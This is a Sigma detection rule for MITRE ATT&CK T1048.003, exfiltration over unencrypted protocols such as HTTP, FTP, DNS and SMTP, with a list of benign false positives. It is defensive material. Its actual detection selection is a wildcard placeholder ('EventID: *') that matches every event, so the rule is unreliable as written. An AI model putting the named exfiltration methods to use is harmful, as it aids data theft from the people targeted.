title: Exfiltration Over Unencrypted Non-C2 Protocol (T1048.003)
id: df00tech-t1048-003
status: experimental
description: "Adversaries may steal data by exfiltrating it over an unencrypted network protocol other than that of the existing command and control channel. Common protocols used include HTTP, FTP, SMTP, DNS, and TFTP. Data may be obfuscated using encoding schemes such as Base64 or embedded within protocol headers and fields without the use of encryption. Real-world threat actors including Lazarus Group, FIN8, APT32, Salt Typhoon, and Mustang Panda have leveraged FTP, HTTP POST, DNS tunneling, and SMTP for this purpose."
references:
  - https://attack.mitre.org/techniques/T1048/003/
  - https://df00tech.com/detections/T1048.003
author: df00tech
date: 2026/04/16
tags:
  - attack.t1048.003
# NOTE: logsource is auto-derived and may need adjustment for your environment
logsource:
  category: process_creation
  product: windows
detection:
  # This detection logic could not be auto-translated; see the KQL/SPL query on df00tech.
  selection:
    EventID: '*'
  condition: selection
falsepositives:
  - Legitimate FTP file transfers by IT operations teams using WinSCP or FileZilla to upload builds to internal FTP servers
  - Web developers or DevOps engineers using curl or wget to upload files to HTTP-based staging servers or artifact repositories
  - Monitoring agents or backup tools making HTTP connections on non-standard ports to internal infrastructure that happens to use plaintext
  - Network scanning or vulnerability assessment tools that probe FTP/HTTP ports on public IPs as part of authorized engagements
  - Internal mail relay servers or legacy applications using SMTP on port 25 for legitimate notification emails
level: high